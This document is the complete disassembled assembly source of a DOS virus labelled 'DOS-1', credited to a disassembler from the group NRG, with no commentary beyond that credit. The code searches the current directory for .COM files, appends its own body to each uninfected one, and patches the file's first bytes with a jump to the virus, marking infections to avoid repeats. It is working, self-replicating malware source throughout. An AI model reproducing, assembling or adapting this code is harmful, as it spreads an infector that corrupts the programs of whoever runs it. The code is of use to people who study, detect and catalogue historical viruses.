DOS1
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
.model tiny
.code
org 100h
start:
dec bp
nop
int 20h
HostFile:
Virus_Entry:
call GetOffset
Displacement:
db 'DOS-1',0
GetOffset:
pop si
sub si,offset Displacement-start
cld
mov di,100h
push di
push si
movsw
movsw
pop si
lea dx,[si+VirusDTA-start]
call SetDTA
mov ax,1100h
FindFirstNext:
lea dx,[si+SearchString-start]
int 21h
or al,al
jnz ResetDTA
lea dx,[si+VirusDTA-start]
mov ah,0fh
int 21h
or al,al
jnz FindNextFile
push dx
mov di,dx
mov word ptr [di+0Eh],1
xor ax,ax
mov [di+21h],ax
mov [di+23h],ax
lea dx,[si]
call SetDTA
lea dx,[di]
mov ah,27h
mov cx,4
int 21h
cmp byte ptr [si],'M'
je CloseFile
mov ax,[di+10h]
mov [di+21h],ax
cmp ax,0F800h
ja CloseFile
push ax
lea dx,[si]
call SetDTA
lea dx,[di]
mov ah,28h
mov cx,end_virus-start
int 21h
xor ax,ax
mov [di+21h],ax
lea di,[si]
mov ax,0E94Dh
stosw
pop ax
stosw
push dx
lea dx,[si]
call SetDTA
pop dx
mov ah,28h
mov cx,4
int 21h
CloseFile:
pop dx
call SetDTA
mov ah,10h
int 21h
FindNextFile:
mov ah,12h
jmp short FindFirstNext
ResetDTA:
mov dx,80h
call SetDTA
retn
SetDTA:
mov ah,1Ah
int 21h
retn
db 'MK'
SearchString:
db 0
db '????????COM'
end_virus:
org 1d1h
VirusDTA:
end start
